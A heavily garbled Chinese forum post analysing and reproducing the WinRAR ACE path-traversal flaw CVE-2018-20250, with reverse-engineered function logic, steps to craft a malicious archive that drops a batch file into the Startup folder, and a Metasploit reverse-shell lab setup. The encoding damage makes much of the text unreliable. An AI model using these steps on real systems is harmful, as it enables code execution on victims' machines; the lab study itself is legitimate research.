ƽ - LCG - LSG |׿ƽ||ƽܛ|ŷƱ  www.ykwek.com

 һܴa
 ע[Register]

QQ

ֻһ_ʼ

: ctf Ó ̳
鿴: 7887|؏: 101
һ} һ}

欧洲足球联赛排名 : [©] CVE-2018-20250©

  [朽]
Dָnj
Dustin_Du l 2020-2-15 11:26
Dustin_Du 2020-2-15 20:21 ݋

Փʽ{^韩wɅCSDNλÑͬ

һ
֪WinRARһ܏ĉsnRAR Windowshڂݔsļ≺RAR/ZIPȸʽļRAR/ZIPȸʽĉsļõ^Vđ2019220Check PointF꠱һPWinRAR19©ӿԓ©ȡܺӋCĿƙԓF꠽^оzy^lFWinRARĂȫ©քeACEļC߉݋@^©CVE-2018-20250ACEļ߉݋C@^©CVE-2018-20251ACE/RARļԽ猑©CVE-2018-20252ԼLHA/LZHļԽ猑©CVE-2018-20253©߿©ͨ^TʹÑʹWinRAR_☋ĉsļaϵyĿ䛻ߌ됺dllٳܛMЈFÑCaйϢȫ©ƽ_CNVD©ľCuΣ2019221ԓϵ©CNVD-2019-04911CNVD-2019-04912CNVD-2019-04913CNVD-2019-04910քeCVE-2018-20250CVE-2018-20251CVE-2018-20252CVE-2018-20253ͬrlȫ
©B

CVE-2018-20250©İlFڿƼˮ܎ȻM@©×lHΣǺܸȻ˿ֵ֑@©ѽz19Ӱ푵ȫ5|WinRARÑ©aĸԭlF}PI5.70 Beta 1֮ǰ汾WinRARʹfĄӑB朽ӎunacev2.dllԓӑB朽ӎľgrg2005̎ACEʽļ^аl]ȻsoκεĻA??/font>(ASLR, DEP )ԮʹWinRARACEļMн≺rڛ]ЌļMг^VaĿ䛴ԽF[صĐļԌFӋCĿԌ_CļĈоlF@N©Ӱ푷dzVӰ푷
  • lrg5.70 Beta 1WinRARܛ
  • ʹunacev2.dllӑBĽ≺ļܛ

YvӍ䌍ҺmęzyY԰lFWinRARܛ߀6.2.0.0Լ֮ǰ汾Bandizips5.9.8.10907Լ֮ǰ汾2345É4.0.0.1170360sȹӋ38sܛ©ӰPƽ_Sܛṩ̶ڵһrgվ˳eOԓϵ©ĿǰWj©ԭѹ_SҲѰl°汾ޏʹ©мƷλɰlFCVE-2018-20250˷N©˼·^ڌH^к˂ܲɫaIAWinRAR unacev2.dlla©߀һ@IJҪܺ؆ϵyaܵԈvӍȫҊ{Čԓ©ĺڱOlFߌWinRAR©õֶMһ̶Ϝpˌܺ؆ϵyهͬr_ľRڵһrg^Lime-RAThľRԓhľRĹʮ֏ͨ^޸Ϣ߽C2C&CĿshͿƷָԌFļڵVdMȹľR߀ԱOҕаzyܺCMД؛ŽוrֱQXַ_XĿ؎ŵVּ܎Ž׵ȺΣO
 ©
3.1 unacev2.dlla©ȱݸ
  

D1 Ҋʽ

ԓNʽDZ^γҊĹʽô©쐺ĉsļڲ֪rŒ≺ጷŕr≺ܛҪ≺Ŀ˵·Mн˕runacev2.dllеCleanPath^VĿ䛴Խ©[еĐľR_CKÑ؆XrٳɐľRĈ˞ԓ©ԭ҂Ҫ̽unacev2.dllʹüͨ^MдalFɂPACEļwnȡPIʼACEInitDllȡACEExtractȻIDAyԲ鿴@ɂąx菽githubҵһͬʹ@NY_ԴĿFarManagerԓĿʹôdllԓĿĄҲWinRARĄ^ߵĿŶdꮅͨ^ʹsourceinsight݋_Githubе_ԴFarManagerPACEInitDllACEExtractľwxYˆDăHչʾĿеĴλwxx߿Ќ`@ã

                    

D2 ACEInitDllx

                             
D3 ACEExtractx

pACEInitDllStruc ָᘽYw^PIҪcעһ£
        
D4 pACEInitDllStrucָᘽYwx

YCheck PointF꠰l©ԭYIDAoBunacev2.dllMоcPעĂPICleanPathGetDevicePathLenWinRAR Validators/Callbacks{Լ|lĿ䛱v©sprintf
3.2 CleanPathPI
PCleanPathĂδa
                 
D5 CleanPathδa                    
     
     1.Pathĵ23ַ顰:\ôPath4ַ֮ǰIJ     
     2.Pathĵ2ַ顰:3ַ顰\ôPath3ַ֮ǰIJ     
     3.PathЌҡ..\FλPathTraversalPosָλҵ4t7   
     4.PathTraversalPosָλPath_ʼλ(e.g...\some_folder\some_file.ext)PathTraversalPosָλõǰһַǡ\5t6  
     5.Path4ַ֮ǰIJ,^mPathЌҡ..\Fλҵ4t7
     6.Path+1̎ҡ..\FλҵtвE4t7     
     7.Path               
      
@΂δaĴ̿飺ɷ֪ԓÞ^Vһʽ·P:\ڲE1P:ڲE2P:\P:ͨ^E1ͲE2ɂE\..\ڲE5

3.3 GetDevicePathLenPI

PGetDevicePathLenĂδa
   
D6 GetDevicePathLenδa

@΂δaĴ̿飺        

     1.Pathе1ַ顰\2t7     
     2.Pathе2ַ顰\3t6     
     3.Path3ַ֮]ҵ\0tSlashPosָλ     
     4.SlashPos+1֮]ҵ\0tSlashPosָλ     
     5.SlashPosָλÜpȥPathָλټ1xֵoResultȻвE9     
     6.Resultxֵ1Ȼ9     
     7.Path2ַ顰:Resultxֵ2     
     8.Path3ַ顰\Resultֵ1     
     9.Result                     
      
ɷ֪ԓÞzļ·PathResultYʾ·Lȷ?ԽResultȡֵЃɷNr00
£l z·C:\some_folder\some_file.exttֵ3
l z·\some_folder\some_file.exttֵ1
l z·some_folder\some_file.exttֵ0
3.4 WinRAR Validators/Callbacks{
PWinRAR Validators/Callbacks{Ăδa

D7 WinRAR Validators/Callbacks{δa

returnصĞ궨xwxɅFarManagerĿеĶxf

D8 궨xx
ɷ֪ԓȡļ·MЙz飨ЂδaSourceFileNameʾȡļ·_·M—l
1.һַڡ\/
2.ļַ..\../_^
3.ַвڡ\..\\..//..//..\

3.5 |lĿ䛱v©sprintf
     
D9 |lĿ䛱v©sprintfIDAеλ
IDAKλa©ԪtȦеsprintfloc_40CC32KϷЃɂ֧GetDevicePathLenĺ{ýYӰa

{GetDevicePathLenĽY0tУ

֮tУ

һsprintf|lĿ䛱v©e`a@ζ·Hόҕ鑪/ļ/Ŀ䛵·
3.6 ©˼·
^≺^unacev2.dllõPI?ķ?҂ɇLԇ칥˼·ˆDʾ

D10 ˼·
ͨ^ԓ˼·҂ҵһҵһS҂ļȡϵyԆļAoPÑ҂

CleanPath^VDQ·ٴ^ЄhˡC:\C:


GetDevicePathLenC·еõ2ʴĿļA|lĿ䛱v©sprintf
  • WinRARĻ{≺Ŀ·MC
3.4еClɰlFõK·@^·vCֻܻһļA҂Ҫڲ֪ÑrŒļ≺sĿϵyԆļA
  • ļȡꮅ·

WinRARbĿІӽ≺ܛtǰĿ䛡:

Ȼͨ^pnļIΓnļеġextractWinRARtWinRARġǰĿ䛡ɞnļA·
nλÑġdļAtWinRARġǰĿ䛡飺

  nλDesktopļAtǰĿ䛡·飺

   ԮdļAMн≺rõK·飺


©cC
ԓ©ùܿPܺMн≺ļ|l©rϵyPڲ֪ӋCCrֻg[ĬJd·£C:\Users\Administrator\DownloadsMн≺߶Žׂ·a©DLLļUNACEV2.DLLRe·©×l߀ļֱ횞^·ǎ׷Nϵyµ_C·԰lFڂPCÑĶԹyԲœyʴ_·ÑһAdministrator@©ڷöȱ^           

                              1 ͬϵyµ_C·
Win2003
C:\Documents and  Settings\Administrator\_ʼˆ\\   
Win2008
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start-  Menu\Programs\Startup
Win2012
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start-  Menu\Programs\Startup
Win7
C:\Users\Ñ \AppData\Roaming\Microsoft\Windows\Start- Menu\Programs\Startup
Win10
C:\Users\Ñ\AppData\Roaming\Microsoft\Windows\Start-  Menu\Programs\Startup

ԇʹõWin7ϵy
4.1 UNACEV2.dllУCRCl©
©ҪWinrarÁ≺ACEļrʹõĄӑB朽ӎUNACEV2.dllUNACEV2.dll̎filenamerֻУCRC҂ͨ^ʹ010Editor޸filenameļ≺Ŀ޸ɺCRCУʧ҂߀Ҫȥ޸CRCw^ՈҊķгΌĹΣ
    
  ̓MC  
VMware Workstation11.0.0
  ϵyR  
Win7ͥ
  WinRAR  5.60  
https://www.rarlab.com/rar/winrar-x64-560sc.exe
  Python-3.7.2-amd64.exe  
https://www.python.org/ftp/python/3.7.2/python-3.7.2-amd64.exe
  010Editor  
https://download.sweetscape.com/010EditorWin64Installer901.exe
  Waceģļ  
https://github.com/360-A-Team/CVE-2018-20250
  EXP  
https://github.com/WyAtu/CVE-2018-20250
һܛbꮅʽM댍򞲿֣
  • һεbatļK©ñnjԓļϵyУ


  • ʹWinACE1.batMЉs,xstore full pathģʽõļ1.ace

  • ʹhttps://github.com/WyAtu/CVE-2018-20250еacefile.py_zļ1.aceheaderϢ



tɫ֞Ҫ޸ĵăͬrʹ010Editor_1.aceȿ֪ԓaceļСģʽ  

һtɫȞ飺hdr_crcֵ0xC98CڶtɫȞ飺filenameļ·ǰ0x001AfilenameLʮMƞ26

tɫȞ飺hdr_size^Сֵ0x0039ʾ^С57 ƆĿ·aceļ޸ģ

޸ģ


޸filenameLȣ


޸hdr_size


ʹacefile.pyaceļԿeҪ޸hdr_crc



ʹacefile.py_zļ1.aceheaderϢ

޸ꮅ1.rarHϲԓҲһֱӽ≺1.ace

x≺ǰļA≺ļA1Կbatļɹ≺_C

  ؆XlFԄ\batļ

4.2 msf
msfһMdĿق֪ܛ©ČI©ͨ^Ժ׵ث@ȡ_lӋCܛ©ʩYCVE-2018-20250©С򞌢FTֲĶͬFһα^ΣԵĹwh£
    
  ̓MC  
VMware Workstation11.0.0
  ϵyR1  
Win7ͥ
  Win7  ip  
192.168.116.147
  ϵyR2  
kali-linux-2018.4-amd64.iso
  Ⱥ˰汾2  
4.18.0-kali2-amd64  #1 SMP Debian 4.18.10-2kali1 (2018-10-09) x86_64 GNU/Linux
  Kali  ip  
192.168.116.128

kalihĿ˙CĺTҪ֪Ŀ˙Cipַ

õshell.exeT쉺sļɅ4.1А≺sļĘ^ļʹacefile.py_zheaderϢ

shell.aceļx≺ǰļA≺ļAshellԿbatļɹ≺_C

kaliMmsfconsoledexploit/multi/handler??br />
OñCipַO ˿ȻLԇO exploit


  ؆win7lFkaliѝB͸ɹõĿ˙Cshell



 ĵw
ڷ©^˸NY©ÙCƱ^ԭDZ^sҪxPĿĴaԼҪIDAҵPIYęnoBYܰѻ߉݋ʣµČ`^^^qµϴYھWWinRAR©ðɰlFֶڸc܄ĺڿѽ³˺ܶ汾xɂ^͵湥ֶʾ


ͨ^ԓ©ķ`Pߌ≺ܛеһЩ?q˽?؄eڌWinRARߵFarManagerĿԴax^ի@HS©õ汾ڕrgޛ]Ёüо[s֮иX©ֶһ̶Ͼ֮ͨ̎m@ЌW֮              

Y
[1]Extracting a 19 Year Old Code Execution from WinRARhttps://research.checkpoint.com/extracting-code-execution-from-winrar/
[2] WinRARĿ䛴Խ©\ͬFCVE-2018-20250https://mp.weixin.qq.com/s/KbDliC2e0_bkFFur4nx-LQ
[3] WinRAR©CVE-2018-20250ӱ //www.52bug.cn/hkjs/5732.html
[4] CVE-2018-20250 winrarhttps://www.cnblogs.com/threesoil/p/10534280.html
[5] [CVE-2018-20250]WinRAR©\Մhttps://www.landui.com/help/show-9239
[6] [©ͬF]WinRARĿ䛴Խ©CVE-2018-20250ͬFhttps://www.cnblogs.com/fox-yu/p/10495236.html
[7] MetasploitʹúTB͸Windows7//www.myhack58.com/Article/html/3/8/2015/65031.htm
[8] ɹ@ȡWinRAR 19vʷa©https://www.360zhijia.com/anquan/444960.html
[9] FarManagerĿhttps://github.com/FarGroup/FarManager

Mu

73ێ +61 ֵ +68
С + 1 Һٝͬ
Lyleyang + 1 Ļ؏
52pojieMiaaa + 1 x[email protected]
macolma + 1 + 1 Ļ؏
yutu925 + 1 + 1 x[email protected]
xiaoС + 1 + 1 Һٝͬ
22222 + 1 + 1 Һٝͬ
ҹ + 1 + 1 x[email protected]
Seago + 1 YͦԼҲͬFԇԇ
weigaojing + 1 + 1 Ļ؏
kinglightsecond + 1 + 1 ӑՓ@
˲ + 1 ֻһce־ȥ??
13697i + 1 Һٝͬ
Oµ} + 1 + 1 Һٝͬ
jFae + 1 + 1 ӑՓ@
llcliulichang + 1 + 1 xlԭƷƽՓ
13213099063 + 1 + 1 Һٝͬ
۾ + 1 + 1 gӭӑՓƽՓ
B + 1 x[email protected]
wo + 1 + 1 Ļ؏
kaixuanmen + 1 + 1 Һٝͬ
ζla + 1 + 1 xlԭƷƽՓ
poisonbcat + 1 + 1 x[email protected]
boyce_wang + 1 + 1 Һٝͬ
Suspect_MrX + 1 + 1 Һٝͬ
Ϧ~ + 1 + 1 W
willshion + 1 Һٝͬ
һ + 1 + 1 ӑՓ@
+ 1 + 1 Ļ؏
zhoumeto + 1 + 1 ӑՓ@
min_x91 + 1 + 1 Һٝͬ
ningxijunzhi + 1 xlԭƷƽՓ
smile1110 + 3 + 1 Ȼܿ_
0(_)0 + 1 + 1 Ļ؏
laughingsir38 + 1 + 1 Ļ؏
By + 1 + 1 Һٝͬ
N0LL + 1 + 1 x[email protected]
jnez112358 + 1 + 1 x[email protected]
+ 1 ӑՓ@
tk7758991 + 1 + 1 ӑՓ@
deegar + 1 + 1 Ļ؏
cdz + 1 + 1 ӑՓ@
blywq + 1 + 1 xlԭƷƽՓ
moewold_1773 + 1 + 1 ӑՓ@
wad57210088 + 1 + 1 ӑՓ@
chkds + 1 + 1 ӑՓ@
Ninaļt + 1 + 1 xlԭƷƽՓ
dyyy + 1 + 1 Ļ؏
˜Gʿ + 1 Һٝͬ
MFC + 1 + 1 ӑՓ@
5omggx + 1 + 1 ӑՓ@
Sir + 1 + 1 Һٝͬ
yppsniper + 1 + 1 Һٝͬ
Ԓ + 1 ӑՓ@
pipos + 1 ӑՓ@
deliverance + 1 + 1 ӑՓ@
_ + 1 ӑՓ@
wxdx110 + 1 + 1 ѽ̎xƽՓ֧
jnlylong + 1 + 1 Һٝͬ
󎛱 + 1 x[email protected]
l + 1 ӑՓ@
1p0ch + 1 x[email protected]
ghy_37854 + 1 + 1 x[email protected]
Zerobits + 1 + 1 xlԭƷƽՓ
ʎ + 1 Һٝͬ
liuliang266 + 1 + 1 Һٝͬ
Ů}r + 1 + 1 Һٝͬ
Mc.Zhang + 1 + 1 x[email protected]
yixi + 1 + 1 x[email protected]
؈ + 1 + 1 Ļ؏
֪o + 1 xlԭƷƽՓ
gaosld + 1 + 1 ӑՓ@
Ҫ_ʼWing + 1 + 1 Ļ؏

鿴ȫu

lǰҪՓܕҪҵĴ𰸻ѽ˰l^ͬՈ؏Ͱl

؏

e

]
Hmily l 2020-2-16 00:05
Dustin_Du l 2020-2-15 23:20
ǰڌWYϺLԇͬF@©ԼY@ƪ

AĄڴ
]
 | Dustin_Du l 2020-3-11 11:41 <
˲ l 2020-3-8 15:27
xxļg
ֻһe־ֵoȥ??

give you the heart&#9829;
_
4#
_ l 2020-2-15 18:07
5#
l 2020-2-15 18:31
gN֧һ̳©ͬFһԇԇ
6#
chenjingyes l 2020-2-15 21:22
gN  ֧һ
7#
allen-love l 2020-2-15 22:13
,ԓW
8#
Hmily l 2020-2-15 23:14
@Dustin_Du ԭ
9#
 | Dustin_Du l 2020-2-15 23:20 <

ǰڌWYϺLԇͬF@©ԼY@ƪ

cu

AĄڴ  Ԕ ؏ l 2020-2-16 00:05
10#
gengshuai l 2020-2-16 10:20
xx С ԇһ
11#
Ontheroad02 l 2020-2-16 10:30
gxx

eҎt 棺Kֹˮ؏c}oP`P

ٻ؏ ղ б

RSSӆ|С|“ϵ҂|ŷƱ ( ICP16042023̖ | W 11010502030087̖ )

GMT+8, 2020-4-3 14:39

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

ٻ؏ ŷƱ б